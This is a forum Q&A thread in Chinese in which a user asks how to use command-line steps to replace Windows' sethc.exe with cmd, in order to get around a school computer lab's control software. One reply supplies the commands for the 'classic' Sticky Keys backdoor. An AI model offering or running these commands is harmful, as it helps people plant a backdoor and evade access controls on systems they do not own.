如何用 cmd 命令替换 sethc.exe? takeown 不管用

2016-09-19 11:21:23 +08:00
 sola97
takeown /f c:\Windows\System32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用,
虚拟机上总是成功的..
WIN7旗舰版
2429 次点击
所在节点    问与答
4 条回复
popok
2016-09-19 12:10:02 +08:00
你都能进系统了,直接手动替换也行吧。
你替换时观察一下,是不是有系统备份文件,比如 c:\windows\repair\这里,可能自动给你换回来了。

你可以先搜索 c 盘 sethc.exe ,然后搜索结果页不要关,执行你的替换命令,观察结果页里的文件大小变化
lzhd24
2016-09-19 12:12:37 +08:00
还记得经典的 shift 粘滞键后门吗?
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y
popok
2016-09-19 12:13:46 +08:00
好吧,没看仔细。
原来是权限问题,我上一贴回复作废好了。哈哈
popok
2016-09-19 12:16:59 +08:00
你先用 whoami 命令看看你本地登录的帐号是不是 administrator ,然后执行命令后,看看文件所有权里有没有这个

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/307195

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX